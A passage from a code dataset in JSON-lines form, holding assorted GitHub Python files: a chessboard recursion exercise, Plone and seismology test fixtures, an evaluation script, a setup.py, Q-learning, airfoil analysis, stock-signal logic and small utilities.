ograniczenia: król może przesunąć się na jedno z 8 sąsiednich pól jeżeli ostatnia cyfra liczby na\npolu na którym stoi jest mniejsza od pierwszej cyfry liczby pola docelowego, oraz w drodze do obranego celu\n(np. narożnika) król nie może wykonać ruchu, który powoduje oddalenie go od celu. Dana jest globalna tablica\nT[8][8] wypełniona liczbami naturalnymi reprezentująca szachownicę. Lewy górny narożnik ma współrzędne\nw=0 i k=0. Proszę napisać funkcję sprawdzającą czy król może dostać się z pola w,k do prawego dolnego\nnarożnika.\n\"\"\"\nfrom random import randint\n\ndef func(T, w_cur, k_cur, w_last, k_last):\n if w_cur == k_cur and w_cur == len(T) - 1:\n if (T[w_cur][k_cur] // 10**(len(str(T[w_cur][k_cur])) - 1)) > (T[w_last][k_last] % 10):\n return True\n elif w_cur == len(T) - 1:\n if (T[w_cur][k_cur] // 10**(len(str(T[w_cur][k_cur])) - 1)) > (T[w_last][k_last] % 10):\n return func(T, w_cur, k_cur + 1, w_cur, k_cur)\n elif k_cur == len(T) - 1:\n if (T[w_cur][k_cur] // 10**(len(str(T[w_cur][k_cur])) - 1)) > (T[w_last][k_last] % 10):\n return func(T, w_cur + 1, k_cur, w_cur, k_cur)\n elif (T[w_cur][k_cur] // 10**(len(str(T[w_cur][k_cur])) - 1)) > (T[w_last][k_last] % 10):\n\n return func(T, w_cur, k_cur + 1, w_cur, k_cur) or func(T, w_cur + 1, k_cur + 1, w_cur, k_cur) or func(T, w_cur + 1, k_cur, w_cur, k_cur)\n\n\n\n#T = [[randint(1, 9) for _ in range(5)] for _ in range(5)]\nT = [[1,2,3],[1,2,3],[1,2,3]]\n\nfor x in T:\n print(x)\n\ndef rekur(T):\n return func(T, 0, 1, 0, 0) or func(T, 1, 1, 0, 0) or func(T, 1, 0, 0, 0)\n\n\nprint(rekur(T))\n\n\n\n","repo_name":"Gygrus/WDI-ASD-course-Python","sub_path":"Semestr I/zestaw_6/cw18.py","file_name":"cw18.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7915054506","text":"# -*- coding: utf-8 -*-\nfrom plone.app.contenttypes.testing import PLONE_APP_CONTENTTYPES_FIXTURE\nfrom plone.app.robotframework.testing import REMOTE_LIBRARY_BUNDLE_FIXTURE\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.testing import z2\n\nimport oli.areadme\n\n\nclass OliAreadmeLayer(PloneSandboxLayer):\n\n defaultBases = (PLONE_APP_CONTENTTYPES_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n self.loadZCML(package=oli.areadme)\n\n def setUpPloneSite(self, portal):\n applyProfile(portal, 'oli.areadme:default')\n\n\nOLI_AREADME_FIXTURE = OliAreadmeLayer()\n\n\nOLI_AREADME_INTEGRATION_TESTING = IntegrationTesting(\n bases=(OLI_AREADME_FIXTURE,),\n name='OliAreadmeLayer:IntegrationTesting'\n)\n\n\nOLI_AREADME_FUNCTIONAL_TESTING = FunctionalTesting(\n bases=(OLI_AREADME_FIXTURE,),\n name='OliAreadmeLayer:FunctionalTesting'\n)\n\n\nOLI_AREADME_ACCEPTANCE_TESTING = FunctionalTesting(\n bases=(\n OLI_AREADME_FIXTURE,\n REMOTE_LIBRARY_BUNDLE_FIXTURE,\n z2.ZSERVER_FIXTURE\n ),\n name='OliAreadmeLayer:AcceptanceTesting'\n)\n","repo_name":"olimpiurob/oli.areadme","sub_path":"src/oli/areadme/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9424252195","text":"from __future__ import annotations\n\nimport logging\nfrom pathlib import Path\nfrom tempfile import TemporaryDirectory\n\nimport numpy as np\nimport pytest\n\nfrom lassie.models.location import Location\nfrom lassie.models.station import Station, Stations\nfrom lassie.octree import Octree\nfrom lassie.tracers.cake import CakeTracer, EarthModel, Timing, TravelTimeTree\nfrom lassie.tracers.constant_velocity import ConstantVelocityTracer\n\nKM = 1e3\nCONSTANT_VELOCITY = 5 * KM\n\n\n@pytest.fixture(scope=\"session\")\ndef small_octree() -> Octree:\n return Octree(\n location=Location(\n lat=10.0,\n lon=10.0,\n elevation=0.2 * KM,\n ),\n size_initial=0.5 * KM,\n size_limit=50,\n east_bounds=(-2 * KM, 2 * KM),\n north_bounds=(-2 * KM, 2 * KM),\n depth_bounds=(0 * KM, 2 * KM),\n absorbing_boundary=1 * KM,\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef small_stations() -> Stations:\n rng = np.random.default_rng(1232)\n n_stations = 20\n stations: list[Station] = []\n for i_sta in range(n_stations):\n station = Station(\n network=\"XX\",\n station=\"STA%02d\" % i_sta,\n lat=10.0,\n lon=10.0,\n elevation=rng.uniform(0, 0.1) * KM,\n depth=rng.uniform(0, 0.1) * KM,\n north_shift=rng.uniform(-2, 2) * KM,\n east_shift=rng.uniform(-2, 2) * KM,\n )\n stations.append(station)\n return Stations(stations=stations)\n\n\ndef test_sptree_model(travel_time_tree: TravelTimeTree):\n model = travel_time_tree\n\n with TemporaryDirectory() as d:\n tmp = Path(d)\n file = model.save(tmp)\n\n model2 = TravelTimeTree.load(file)\n model2._load_sptree()\n\n source = Location(\n lat=0.0,\n lon=0.0,\n north_shift=1 * KM,\n east_shift=1 * KM,\n depth=5.0 * KM,\n )\n receiver = Location(\n lat=0.0,\n lon=0.0,\n north_shift=0 * KM,\n east_shift=0 * KM,\n depth=0,\n )\n\n model.get_travel_time(source, receiver)\n\n\ndef test_lut(\n travel_time_tree: TravelTimeTree,\n octree: Octree,\n stations: Stations,\n) -> None:\n model = travel_time_tree\n model.init_lut(octree, stations)\n\n traveltimes_tree = model.interpolate_travel_times(octree, stations)\n traveltimes_lut = model.get_travel_times(octree, stations)\n np.testing.assert_equal(traveltimes_tree, traveltimes_lut)\n\n # Test refilling the LUT\n model._node_lut.clear()\n traveltimes_tree = model.interpolate_travel_times(octree, stations)\n traveltimes_lut = model.get_travel_times(octree, stations)\n np.testing.assert_equal(traveltimes_tree, traveltimes_lut)\n assert len(model._node_lut) > 0, \"did not refill lut\"\n\n stations_selection = stations.model_copy()\n stations_selection.stations = stations_selection.stations[:5]\n traveltimes_tree = model.interpolate_travel_times(octree, stations_selection)\n traveltimes_lut = model.get_travel_times(octree, stations_selection)\n np.testing.assert_equal(traveltimes_tree, traveltimes_lut)\n\n\n@pytest.mark.asyncio\nasync def test_travel_times_constant_velocity(\n small_octree: Octree,\n small_stations: Stations,\n):\n octree = small_octree\n stations = small_stations\n octree.size_limit = 200\n cake_tracer = CakeTracer(\n phases={\"cake:P\": Timing(definition=\"P,p\")},\n earthmodel=EarthModel(\n filename=None,\n raw_file_data=f\"\"\"\n -2.0 {CONSTANT_VELOCITY/KM:.1f} 2.0 2.7\n 12.0 {CONSTANT_VELOCITY/KM:.1f} 2.0 2.7\n\"\"\",\n ),\n )\n constant = ConstantVelocityTracer(\n velocity=CONSTANT_VELOCITY,\n )\n\n await cake_tracer.prepare(octree, stations)\n\n cake_travel_times = cake_tracer.get_travel_times(\"cake:P\", octree, stations)\n constant_traveltimes = constant.get_travel_times(\"constant:P\", octree, stations)\n\n nan_mask = np.isnan(cake_travel_times)\n logging.warning(\"percent nan: %.1f\", (nan_mask.sum() / nan_mask.size) * 100)\n\n constant_traveltimes[nan_mask] = np.nan\n np.testing.assert_almost_equal(cake_travel_times, constant_traveltimes, decimal=2)\n","repo_name":"pyrocko/lassie-v2","sub_path":"test/test_cake.py","file_name":"test_cake.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"73565424806","text":"#!/usr/bin/env python\n\nimport argparse\nfrom subprocess import check_output\nimport json\nimport os\nfrom pathlib import Path\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"hyps\")\n parser.add_argument(\"refs\")\n args = parser.parse_args()\n\n e2e_eval_script = (\n Path(__file__).parent / \"e2e-metrics\" / \"measure_scores.py\"\n )\n\n with open(os.devnull, \"w\") as DEVNULL:\n output = check_output(\n \"python {} {} {}\".format(\n e2e_eval_script, args.refs, args.hyps),\n shell=True,\n stderr=DEVNULL).decode(\"utf8\")\n\n results = {}\n for line in output.strip().split(\"\\n\")[2:]:\n metric, score = line.split(\": \")\n score = float(score)\n results[metric] = score\n print(json.dumps(results))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kedz/noiseylg","sub_path":"eval_scripts/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"22329462546","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport glob\nimport os\nimport sys\nimport warnings\nimport itertools\n\ntry:\n import setuptools\nexcept ImportError:\n import distutils.core as setuptools\n\nLIBEVENT_BUILD_DIR = '../libevent*'\n\ndef get_best_build_dir():\n candidates = reversed(glob.glob(LIBEVENT_BUILD_DIR))\n matches = (dir for dir in candidates if os.path.isdir(dir))\n try:\n best = next(matches)\n print('found libevent build directory', best)\n except StopIteration:\n warnings.warn(\"Could not find libevent\")\n best = '../libevent'\n return best\n\ndef get_extension():\n event = setuptools.Extension(name='event', sources=['event.c'])\n system_libs = itertools.chain(\n \tglob.iglob('/usr/lib/libevent.*'),\n \tglob.iglob('/usr/lib64/libevent.*'),\n )\n if any(system_libs):\n print('found system libevent for', sys.platform)\n event.libraries = ['event']\n return event\n for prefix in (sys.prefix, \"/usr/local\", \"/opt/local\"):\n if glob.glob(\"%s/lib/libevent.*\" % prefix):\n print('found installed libevent in', prefix)\n event.include_dirs = ['%s/include' % prefix]\n event.library_dirs = ['%s/lib' % prefix]\n event.libraries = ['event']\n return event\n\n ev_dir = get_best_build_dir()\n event.include_dirs.append(ev_dir)\n\n if sys.platform == 'win32':\n event.include_dirs.extend([\n '%(ev_dir)s/WIN32-Code' % locals(),\n '%(ev_dir)s/compat' % locals()\n ])\n sources = ['WIN32-Code/win32.c', 'log.c', 'event.c']\n sources = [os.path.join(ev_dir, source) for source in sources]\n event.sources.extend(sources)\n event.extra_compile_args.extend(['-DWIN32', '-DHAVE_CONFIG_H'])\n event.libraries.append('wsock32')\n else:\n event.extra_objects.extend(glob.glob('%(ev_dir)s/*.o' % locals()))\n\n return event\n\nsetup_params = dict(\n name='event',\n version='0.4.3',\n author='Dug Song',\n author_email='dugsong@monkey.org',\n maintainer='Jason R. Coombs',\n maintainer_email='jaraco@jaraco.com',\n url='https://github.com/jaraco/pyevent',\n description='event library',\n long_description=\"\"\"This module provides a mechanism to execute a function when a specific event on a file handle, file descriptor, or signal occurs, or after a given time has passed.\"\"\",\n license='BSD',\n ext_modules = [get_extension()],\n)\n\nif __name__ == '__main__':\n setuptools.setup(**setup_params)\n","repo_name":"jaraco/pyevent","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"38832136420","text":"from environment import MountainCar\nimport sys\nimport numpy as np\nfrom random import randint\n\ndef main(args):\n pass\n\ndef q_val(state, weight, bias, mode):\n if mode == 'raw':\n s = np.zeros(2)\n else:\n s = np.zeros(2048)\n for key,val in state.items():\n s[key] = val\n return (np.dot(np.array(s), weight) + bias), np.array(s)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n \n mode = sys.argv[1]\n weight_out = sys.argv[2]\n returns_out = sys.argv[3]\n episodes = int(sys.argv[4])\n max_iterations = int(sys.argv[5])\n epsilon = float(sys.argv[6])\n gamma = float(sys.argv[7])\n learning_rate = float(sys.argv[8])\n\n alpha = learning_rate\n\n \n x = MountainCar(mode)\n if mode == 'raw': \n w = np.zeros([2,3],dtype=float)\n else:\n w = np.zeros([2048,3],dtype=float)\n bias = 0.0\n \n ##print(x.state)\n \n \n ##print(q(x.state,1, w, bias))\n '''\n q = q_val(x.state, w, bias)\n for a in range(3):\n next_state, reward, done = x.step(a)\n q_next = q_val(next_state, w, bias)\n current_state = np.array([x.state[0], x.state[1]])\n ##print(alpha * (q[a] -(reward + (gamma * max(q_next)))) * current_state)\n w[:,0] = w[:,0] - (alpha * (q[a] -(reward + (gamma * max(q_next)))) * current_state)\n\n print(w)\n \n '''\n \n rng = np.random.RandomState()\n seed = rng.randint(2**31 - 1)\n rng.seed(seed)\n \n \n returns_out_file= open(returns_out,\"w\")\n \n for e in range(episodes):\n state = x.reset()\n #print(state)\n total_rewards = 0\n ##q = q_val(state, w, bias) \n ##a = np.argmax(q)\n \n \n for i in range(max_iterations):\n \n q, current_state = q_val(state, w, bias, mode) \n a = np.argmax(q)\n next_state, reward, done = x.step(a)\n q_next, next_state_np = q_val(next_state, w, bias, mode)\n next_random_action = rng.randint(0,2+1)\n ##current_state = np.array([x.state[0], x.state[1]])\n \n update = float(alpha) * (q[a] - (float(reward) + (float(gamma) * ((max(q_next) * (1.0 - epsilon)) + (q_next[next_random_action] * epsilon )))))\n ##w[:,a] = w[:,a] - (alpha * ((q[a] -(reward + (gamma * ((max(q_next) * (1.0 - epsilon)) + (q_next[next_random_action] * epsilon))))) * current_state))\n w[:,a] = w[:,a] - (update * current_state)\n \n ##w[:,next_random_action] = w[:,next_random_action] - (alpha * (q[next_random_action] -(reward + (gamma * q_next[next_random_action] * (epsilon)))) * current_state)\n \n \n bias = bias - update\n \n state = next_state\n ##q = q_next\n ##a = np.argmax(q) \n if done :\n total_rewards = total_rewards + reward\n break\n total_rewards = total_rewards + reward\n \n \n returns_out_file.write(str(total_rewards) + \"\\n\")\n \n \n #print(bias) \n w_flat = w.flatten(order='C')\n weights = np.insert(w_flat,0,bias)\n np.savetxt(weight_out, weights)\n returns_out_file.close()\n \n \n \n \n \n ","repo_name":"dpbird/Machine-Learning-Algorithms","sub_path":"ReInforcement Learning - Q Learning/code and data/python/q_learning.py","file_name":"q_learning.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41469374758","text":"\"\"\"\n Unit tests for slit_length_calculator\n\"\"\"\n\nimport os.path\nimport unittest\nfrom sasdata.dataloader.readers.ascii_reader import Reader\nfrom sas.sascalc.calculator.slit_length_calculator import SlitlengthCalculator \\\n as calculator\n\n\ndef find(filename):\n return os.path.join(os.path.dirname(__file__), 'data', filename)\n\n\nclass SlitCalculator(unittest.TestCase):\n \n def setUp(self):\n \n self.reader = Reader()\n \n def test_slit_length_calculation(self):\n \"\"\"\n Test slit_length_calculator\"\n \"\"\"\n list = self.reader.read(find(\"beam profile.DAT\"))\n self.assertTrue(len(list) == 1)\n f = list[0]\n cal = calculator()\n cal.set_data(f.x,f.y)\n slit_length = cal.calculate_slit_length()\n \n # The value \"5.5858\" was obtained by manual calculation.\n # It turns out our slit length is FWHM/2\n self.assertAlmostEqual(slit_length, 5.5858/2, 3)\n \n \nif __name__ == '__main__':\n unittest.main()\n \n","repo_name":"SasView/sasview","sub_path":"test/sascalculator/utest_slit_length_calculator.py","file_name":"utest_slit_length_calculator.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"12983832275","text":"\n\"\"\" @author : Bivek Panthi\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\n\ndef random_shuffle(x_tensor, y_tensor):\n \"\"\"\n Function to shuffle two tensor in same order\n\n Parameters : \n x_tensor : first tensor to shuffle\n y_tensor : second tensor to shuffle\n\n \"\"\"\n idx = tf.range(start=0, limit=tf.shape(x_tensor)[0], dtype=tf.int32)\n shuffled_idx = tf.random.shuffle(idx)\n x_tensor, y_tensor = tf.gather(x_tensor, shuffled_idx), tf.gather(y_tensor, shuffled_idx)\n return x_tensor, y_tensor\n\ndef random_generator(shape_):\n \"\"\"\n Function to generate random gaussian noise of shape 'shape_'\n\n Parameters : \n shape_ : shape of the gaussian noise tensor\n \"\"\"\n random_gaussian_vectors = tf.random.normal(shape=shape_)\n random_gaussian_vectors = tf.cast(random_gaussian_vectors, dtype=tf.float64)\n # combine_vector = tf.concat([random_gaussian_vectors], axis=1)\n return tf.cast(random_gaussian_vectors, dtype=tf.float64)\n\ndef unison_shuffle(arr1 : np.array, arr2 : np.array):\n \"\"\"\n Function to shuffle two numpy arrays in same order\n\n Parameters : \n arr1 : first numpy array to shuffle\n arr2 : second numpy array to shuffle\n \"\"\"\n assert len(arr1) == len(arr2)\n p = np.random.permutation(len(arr1))\n return arr1[p], arr2[p]\n\ndef __gen(reader):\n while True:\n temp = reader(2**16)\n if not temp: break\n yield temp\n\ndef buf_count_newlines(filename : str):\n \"\"\"\n Function to count the number of newline characters\n\n Parameters : \n filename : name of the file to count the newline\n \"\"\"\n with open(filename, \"rb\") as fb:\n count = sum(buf.count(b\"\\n\") for buf in __gen(fb.raw.read))\n return count\n\ndef ExtractLines(filename : str, n : int, line_length : int = 14):\n \"\"\"\n Function to extract specific lines from a file\n\n Parameters : \n filename : name of the file to extract lines\n n : file sequence number. Used for structing the filename \n line_length : length of lines to extract\n \"\"\"\n with open(filename, 'r') as fp:\n x = fp.readlines()[n*line_length:(n+1)*line_length]\n output_filename = 'molecule{:05d}.xyz'.format(n)\n with open(output_filename, \"w\") as text_file:\n text_file.writelines(x)","repo_name":"panthibivek/Generative-Adversarial-Network-for-Improving-Sampling-of-Molecular-Trajectories","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8664246407","text":"from datetime import timedelta\nfrom enum import Enum\n\nfrom .timeseries import TimeSeries\n\n\nclass StockSignal(Enum):\n buy = 1\n neutral = 0\n sell = -1\n\n\nclass Stock:\n LONG_TERM_TIMESPAN = 10\n SHORT_TERM_TIMESPAN = 5\n\n def __init__(self, symbol):\n self.symbol = symbol\n self.history = TimeSeries()\n\n @property\n def price(self):\n try:\n return self.history[-1].value\n except IndexError:\n return None\n\n def update(self, timestamp, price):\n if price < 0:\n raise ValueError(\"price should not be negative\")\n self.history.update(timestamp, price)\n\n def is_increasing_trend(self):\n return self.history[-3].value < self.history[-2].value < self.history[-1].value\n\n def _get_closing_price_list(self, on_date, num_days):\n closing_price_list = []\n for i in range(num_days):\n chk = on_date.date() - timedelta(i)\n for price_event in reversed(self.price_history):\n if price_event.timestamp.date() > chk:\n pass\n if price_event.timestamp.date() == chk:\n closing_price_list.insert(0, price_event)\n break\n if price_event.timestamp.date() < chk:\n closing_price_list.insert(0, price_event)\n break\n return closing_price_list\n\n def _is_crossover_below_to_above(self, prev_ma, prev_reference_ma,\n current_ma, current_reference_ma):\n return prev_ma < prev_reference_ma and current_ma > current_reference_ma\n\n def get_crossover_signal(self, on_date):\n NUM_DAYS = self.LONG_TERM_TIMESPAN + 1\n closing_price_list = self.history.get_closing_price_list(on_date, NUM_DAYS)\n\n if len(closing_price_list) < NUM_DAYS:\n return StockSignal.neutral\n\n long_term_series = closing_price_list[-self.LONG_TERM_TIMESPAN:]\n prev_long_term_series = closing_price_list[-self.LONG_TERM_TIMESPAN-1:-1]\n short_term_series = closing_price_list[-self.SHORT_TERM_TIMESPAN:]\n prev_short_term_series = closing_price_list[-self.SHORT_TERM_TIMESPAN-1:-1]\n\n long_term_ma = sum([update.value\n for update in long_term_series])/self.LONG_TERM_TIMESPAN\n prev_long_term_ma = sum([update.value\n for update in prev_long_term_series])/self.LONG_TERM_TIMESPAN\n short_term_ma = sum([update.value\n for update in short_term_series])/self.SHORT_TERM_TIMESPAN\n prev_short_term_ma = sum([update.value\n for update in prev_short_term_series])/self.SHORT_TERM_TIMESPAN\n\n if self._is_crossover_below_to_above(prev_short_term_ma, prev_long_term_ma,\n short_term_ma, long_term_ma):\n return StockSignal.buy\n\n if self._is_crossover_below_to_above(prev_long_term_ma, prev_short_term_ma,\n long_term_ma, short_term_ma):\n return StockSignal.sell\n\n return StockSignal.neutral\n","repo_name":"syurskyi/Python_Topics","sub_path":"115_testing/examples/Test-Driven Python Development/Chapter 3/test_driven_python-chapter-3/test_driven_python-chapter-3/stock_alerter/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"11880023136","text":"import random\nimport ntpath\n\nimport string\nimport re\n\nimport config\n##\n# Random Generator\n# --------------------------\n# id_generator()\n# >>> 'G5G74W'\n#\n# id_generator(3, \"6793YUIO\")\n# >>>'Y3U'\n##\n\n\ndef id_generator(size=10, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\n# #\n# Extract Images From Text\n# Changes Name in main\n\n\ndef extract_link_from_text(text_with_image, web_safe_topic, new_name):\n image_string = \"\"\n images = re.findall(r\"\\/images\\/.*?JPG\", text_with_image, re.MULTILINE)\n images += re.findall(r\"\\/images\\/.*?jpg\", text_with_image, re.MULTILINE)\n images += re.findall(r\"\\/images\\/.*?PNG\", text_with_image, re.MULTILINE)\n images += re.findall(r\"\\/images\\/.*?png\", text_with_image, re.MULTILINE)\n\n img_count = 0\n\n web_safe_topic = web_safe_topic + \"/\"\n\n for j in images:\n img_count += 1\n\n new_dir_name = ntpath.dirname(j) + \"/\"\n new_dir_name = new_dir_name.replace(\"solution-image/\", \"\")\n new_dir_name = new_dir_name.replace(web_safe_topic, \"\")\n new_dir_name = new_dir_name.replace(config.IMAGE_LINK_OLD, config.IMAGE_LINK_NEW)\n \n new_file_name = \"{0}-{1}.png\".format(web_safe_topic + new_name, img_count)\n new_file_path = new_dir_name + new_file_name\n \n text_with_image = text_with_image.replace(j, new_file_path)\n image_string = image_string + j + \":\" + new_file_path + \"|\"\n\n return (text_with_image, image_string)","repo_name":"icesiv/data_grab","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42742398516","text":"import pyperclip, re\r\nmail= re.compile(r'''(\r\n [a-zA-Z0-9._%+-]+\r\n @\r\n [a-zA-Z0-9.-]+\r\n (\\.[a-zA-Z]{2,4})\r\n )''',re.VERBOSE)\r\n\r\na = mail.search(r'biswasmayank0@gmailcom')\r\nprint(a.group())\r\n","repo_name":"MAYANK123-code/python","sub_path":"laptop.py","file_name":"laptop.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36584953462","text":"import glob\nimport math\nimport os\n\nclass Airfoil:\n \"\"\"create an Aifoil class that will handle the loading and basic processing\n of data associated with an airfoil at multiple angles of attack\n \n Methods associated with it are __init__, load_xy,load_alpha,calc_cl,stag_pt\n and __str__\n \"\"\"\n def __init__(self,inputdir):\n \"\"\"initilalize an instance of the Airfoil class\n \"\"\"\n if not os.path.exists(inputdir): #check if input direcotory exists\n raise RuntimeError(\"input directory does not exist\")\n #check if and files exist\n if glob.glob(inputdir + \"xy*\") == [] or \\\n glob.glob(inputdir + \"alpha*\") == []: \n raise RuntimeError(\"required data files cannot be found in the \\\n data directory\")\n #store the files for each angle of attack\n ang_files = glob.glob(inputdir + \"alpha*\")\n try:\n self.ang_dict = {float(ang_file[len(inputdir)+5:-4]):ang_file \\\n for ang_file in ang_files} #dict that maps angles to corr. files\n except ValueError:\n print(\"angle of attack needs to be a number\")\n self.inputdir = inputdir #store the input directory\n self.ang_att = sorted(self.ang_dict.keys()) #sort the angles \n self.panels = [] #initialize a list of panels\n self.chord = 0 #initialize chord length\n self.x_data = [] #initialize a list of x data\n self.y_data = [] #initialize a list of y data\n self.cp_dict = {} #intialize dict that maps angles to list of Cp values\n self.cl_dict = {} #intiailize dict that maps angles to cl values\n self.stag_dict = {} #initialize dict that maps angles to stag. points\n \n def load_xy(self):\n \"\"\"load the file, store the (x,y) data points,the chord length\n and the (delta_x,delta_y) for each panel\n \"\"\"\n inputdir = self.inputdir\n #catch error with file opening\n try:\n with open(inputdir + \"xy.dat\") as f:\n xy_list = f.readlines()\n except IOError:\n print(\"cannot open the file\")\n del(xy_list[0]) #delete the header \n len_xy = len(xy_list)\n #delete the newline character and store as (x,y) pair\n xy_list = [tuple(xy_list[j][:-1].split()) for j in range(len_xy)]\n x_data = []; y_data = []\n for x,y in xy_list:\n x_data.append(float(x))\n y_data.append(float(y)) \n chord = max(x_data) - min(x_data)\n xy_panels = [(x_data[j+1]-x_data[j],y_data[j+1]-y_data[j]) \\\n for j in range(len_xy) if j < len_xy-1] #definition of panels: (dx,dy)\n \n self.panels = xy_panels\n self.chord = chord\n self.x_data = x_data\n self.y_data = y_data\n \n def load_alpha(self):\n \"\"\"load each file and store Cp values for each\n \"\"\"\n for ang,ang_file in self.ang_dict.items():\n try:\n with open(ang_file) as f:\n cp_list = f.readlines()\n except IOError:\n print(\"cannot open the file\")\n del(cp_list[0]) #delete the header\n #delete the newline character\n cp_list = [float(cp[:-1]) for cp in cp_list]\n \n self.cp_dict[ang] = cp_list\n \n def calc_cl(self):\n \"\"\"calculate the lift coefficient for each angle of attack\n \"\"\"\n chord = self.chord\n for ang,cp_list in self.cp_dict.items():\n cp_len = len(cp_list)\n cx = 0; cy = 0; alpha = math.radians(ang)\n for j in range(cp_len):\n cp = cp_list[j]\n del_x = self.panels[j][0]; del_y = self.panels[j][1]\n #use the formulas for delta_cx and delta_cy\n del_cx = (-cp*del_y)/chord\n del_cy = (cp*del_x)/chord\n cx += del_cx; cy += del_cy\n cl = (cy*math.cos(alpha)) - (cx*math.sin(alpha)) #lift coefficient\n \n self.cl_dict[ang] = cl\n \n def stag_pt(self):\n \"\"\"identify the stagnation point for each angle of attack\n \"\"\"\n for ang,cp_list in self.cp_dict.items():\n stag_cp = max(cp_list) #stagnation point corresponds to max Cp\n panel_num = cp_list.index(stag_cp)\n x_dat = self.x_data; y_dat = self.y_data\n #stagnation point is defined as middle of \"stagnation panel\"\n stag_x = (x_dat[panel_num] + x_dat[panel_num+1])/2\n stag_y = (y_dat[panel_num] + y_dat[panel_num+1])/2\n \n self.stag_dict[ang] = [(stag_x,stag_y), stag_cp]\n \n def __str__(self):\n \"\"\"string representation of an instance of the class\n \"\"\"\n inputdir = self.inputdir\n \n #header\n print(\"Test case: {} {}\\n\".format(inputdir[:4].upper(),inputdir[4:-1]))\n print(\"{:^7}\".format(\"alpha\"),end = ' ')\n print(\"{:^9}\".format(\"cl\"),end = ' ')\n print(\"{:^30}\".format(\"stagnation point\"))\n \n print(\"{:^7}\".format(\"-\"*5),end = ' ')\n print(\"{:^9}\".format(\"-\"*7),end = ' ')\n print(\"{:^30}\".format(\"-\"*26))\n \n #method calls\n self.load_xy()\n self.load_alpha()\n self.calc_cl()\n self.stag_pt()\n \n #actual representation for each angle of attack with lots of formatting\n for ang in self.ang_att:\n cl = self.cl_dict[ang]\n stag_pt_x = self.stag_dict[ang][0][0]\n stag_pt_y = self.stag_dict[ang][0][1]\n stag_cp = self.stag_dict[ang][1]\n angle = float(ang)\n \n print(\"{:6.2f}\".format(angle),end = ' ')\n print(\"{:9.4f}\".format(cl),end = ' ')\n print(\" ({:5.4f},\".format(stag_pt_x),end = ' ')\n print(\"{:7.4f})\".format(stag_pt_y),end = ' ')\n print(\"{:6.4f}\".format(stag_cp))\n return(' ') #ensures no error is generated\n","repo_name":"EmmaAnif/cme211","sub_path":"hw3/airfoil.py","file_name":"airfoil.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70130432166","text":"from athenataf.lib.util.WebPage import WebPage \nfrom athenataf.lib.functionality.page.common.AllGroupPage import AllGroupPage\nfrom athenataf.lib.functionality.page.configuration.security.SecurityPage import SecurityPage\nfrom athenataf.lib.functionality.page.configuration.accessPoints.AccessPointsPage import AccessPointsPage\nfrom athenataf.lib.functionality.page.configuration.vpn.VpnPage import VpnPage\nfrom athenataf.lib.functionality.page.configuration.network.NetworkPage import NetworkPage\nfrom athenataf.lib.functionality.page.configuration.services.ServicesPage import ServicesPage\nfrom athenataf.lib.functionality.page.configuration.rf.RfPage import RfPage\nfrom athenataf.lib.functionality.page.configuration.dhcp.DhcpPage import DhcpPage\nfrom athenataf.lib.functionality.page.configuration.wids.WidsPage import WidsPage\nfrom athenataf.lib.functionality.page.configuration.system.SystemPage import SystemPage\nfrom athenataf.lib.functionality.page.maintenance.userManagement.UserManagementPage import UserManagementPage\nfrom athenataf.lib.functionality.page.maintenance.subscription_keys.SubscriptionKeysPage import SubscriptionKeysPage\nfrom athenataf.lib.functionality.page.maintenance.device_management.DeviceManagementPage import DeviceManagementPage\nfrom athenataf.lib.functionality.page.switch.PortsPage import PortsPage\nfrom athenataf.lib.functionality.page.switch.SwitchesPage import SwitchesPage\nfrom athenataf.lib.functionality.page.switch.SwitchVlansPage import SwitchVlansPage\nfrom athenataf.lib.functionality.page.switch.SwitchSystemPage import SwitchSystemPage\nfrom athenataf.lib.functionality.page.maintenance.FirmWarePage import FirmWarePage\nfrom athenataf.lib.functionality.page.reports.ReportsNetworkPage import ReportsNetworkPage\nfrom athenataf.lib.functionality.page.reports.ReportsSecurityPage import ReportsSecurityPage\nfrom athenataf.lib.functionality.page.reports.ReportsPciCompliancePage import ReportsPciCompliancePage\nfrom 